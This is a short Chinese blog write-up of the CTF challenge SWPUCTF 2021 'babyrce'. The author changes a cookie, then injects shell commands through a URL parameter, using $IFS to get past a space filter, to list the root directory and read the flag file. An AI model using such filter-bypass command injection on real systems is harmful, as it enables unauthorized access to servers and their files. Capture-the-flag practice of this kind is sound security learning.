[SWPUCTF 2021 新生赛]babyrce

穿心莲滴丸

于 2024-09-17 16:07:47 发布

阅读量162

点赞数 1

文章标签： web安全 php

本文链接：https://blog.csdn.net/2301_80115024/article/details/142315371

版权

又是一道洋葱题，讨厌洋葱

根据题目，要使cookie为admin=1，抓包更改cookie值

放包后得到

在网址后加上/rasalghul.php

空格被禁了，可以用$IFS代替

输入url=ls$IFS/

查询flllllaaaaaaggggggg文件内容

url=cat$IFS/flllllaaaaaaggggggg

穿心莲滴丸

关注

1
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

穿心莲滴丸 CSDN认证博客专家 CSDN认证企业博客

码龄1年

暂无认证

20: 原创

58万+: 周排名

7万+: 总排名

3192: 访问

: 等级

243: 积分

44: 粉丝

42: 获赞

10: 评论

39: 收藏

私信

关注

最新评论

【NSSCTF】easy-sql
CSDN-Ada助手: 恭喜你发布了第13篇博客“【NSSCTF】easy-sql”！持续创作不易，你的付出和努力都值得称赞。希望你能继续保持创作的热情，分享更多有趣的内容。或许在下一篇博客中，可以尝试探讨一些更具挑战性的主题，让读者在学习的同时也能获得启发。加油！期待你的下一篇作品！
【CTFHUB】afr-1&afr-2&sql注入
CSDN-Ada助手: 恭喜用户发布了第12篇博客！看到您分享关于【CTFHUB】afr-1&afr-2&sql注入的内容，真的让人受益匪浅。希望您能继续坚持写作，不断分享您的学习心得和经验。或许下一步可以尝试分享一些实战经验或者解决问题的思考过程，让读者更加深入了解相关技术。期待您更多精彩的博客内容，加油！
【攻防世界web】ics-06
CSDN-Ada助手: 恭喜您写下了第8篇博客！标题为“【攻防世界web】ics-06”真是令人期待呢！您在攻防领域的深入研究和持续创作真是令人敬佩。在这篇博客中，您似乎聚焦于攻防世界的web方面，这无疑是一个非常关键的主题。希望您可以继续分享更多关于ICS-06的知识和经验，这将对我们这些对攻防感兴趣的读者非常有帮助。同时，我也希望您在下一篇博客中能够进一步探讨一些与攻防世界web相关的实际案例，或者分享一些实战经验，这将进一步丰富我们的学习内容。期待您的下一篇作品！
【攻防世界web】easyphp
CSDN-Ada助手: 恭喜你发布了第9篇博客！看来你对攻防世界web和easyphp有着深入的了解。希望你能继续坚持写作，分享更多有关攻防世界web和easyphp的知识。或许下一步可以尝试更深入的案例分析或者实践操作，让读者能够更直观地理解这些知识。期待你的下一篇作品！
【攻防世界web】unserialize3
CSDN-Ada助手: 恭喜您第10篇博客的发布！标题“【攻防世界web】unserialize3”听起来非常有趣。我很高兴看到您持续创作并分享关于攻防世界web的知识。您的文章对于我们这些对web安全感兴趣的读者来说是非常有价值的。在下一步的创作中，我想提出一个谦虚的建议。您可以考虑通过在博客中提供更多实际案例和示例来增强读者的理解。这样，读者能够更好地将您的知识应用到实际的攻防场景中。此外，如果您能分享一些您在攻防世界web中遇到的具体挑战，并提供解决方案，将会给读者带来更多启发和帮助。期待您未来更多的精彩博文！继续保持创作，谢谢您的分享！